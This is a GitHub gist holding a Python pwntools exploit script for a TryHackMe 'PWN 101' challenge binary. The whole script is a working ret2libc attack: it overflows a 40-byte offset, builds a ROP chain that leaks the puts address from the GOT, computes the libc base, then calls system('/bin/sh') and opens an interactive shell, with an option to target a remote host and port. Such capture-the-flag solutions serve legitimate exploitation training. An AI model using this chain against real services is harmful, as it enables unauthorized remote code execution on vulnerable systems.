Skip to content

Instantly share code, notes, and snippets.

@DanaEpp
Last active May 7, 2022 22:10
Show Gist options
  • Save DanaEpp/18500ab8c14893da46ae095678a12f43 to your computer and use it in GitHub Desktop.
Save DanaEpp/18500ab8c14893da46ae095678a12f43 to your computer and use it in GitHub Desktop.
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specific your GDB script here for debugging
gdbscript = '''
continue
'''.format(**locals())
offset = 32 + 8 # Adjust for buffer + RBP
log.info( "Starting exploit run..." )
p = start()
log.info( "Building ROP chain to calc libc addr..." )
rop = ROP(elf)
rop.call(rop.ret) # Stack align with extra 'ret' to deal with movaps issue
rop.puts(elf.got.puts)
rop.call(elf.sym.main)
log.info( "Sending payload..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
p.recvline()
puts_str = p.recvline()
puts_addr = u64(puts_str.strip().ljust(8, b"\x00"))
log.info( "Puts is at %#x", puts_addr )
if args.REMOTE:
libc = ELF("libc6_2.27-3ubuntu1.4_amd64.so", checksec=False)
else:
libc = ELF("libc.so.6", checksec=False)
libc.address = puts_addr - libc.sym.puts
log.info( "libc base is at %#x", libc.address )
log.info( "Building ROP chain to exec shell..." )
rop = ROP(libc)
rop.call(rop.ret) # Stack align with extra 'ret' to deal with movaps issue
rop.system(next(libc.search(b'/bin/sh')), 0, 0)
log.info( "Sending payload to get shell..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
p.clean()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment